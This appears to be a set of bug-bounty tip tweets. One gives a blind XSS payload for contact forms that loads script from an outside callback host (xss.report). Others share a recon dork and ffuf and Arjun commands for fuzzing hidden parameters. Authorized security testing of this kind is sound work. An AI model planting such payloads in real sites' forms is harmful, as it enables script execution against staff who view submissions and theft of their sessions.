Good morning Friends today is Blind XSS Triage Day๐
I used https://t.co/KXxVF4FJjF in Contact Form
Payload : '"></script><script src=//xss.report/s/yourserver></script>
#bugbounty#bugbountytip#bugbountytips#infosec#bbp
As recon process I observed few things in dorking
site:*.target.*
This dork was giving all the urls with com,net,co,io
Gathered all the domains and use following to command
/1
For Fuzzing for Hidden Params , you can use FFUF which is faster tool or Arjun:
ffuf -w ~/tools/wordlist/param.txt:PARAM -u "$1?PARAM=XSS" -mr "XSS" -c
arjun -w ~/tools/wordlist/param.txt -u $1
#bugbounty#bugbountytips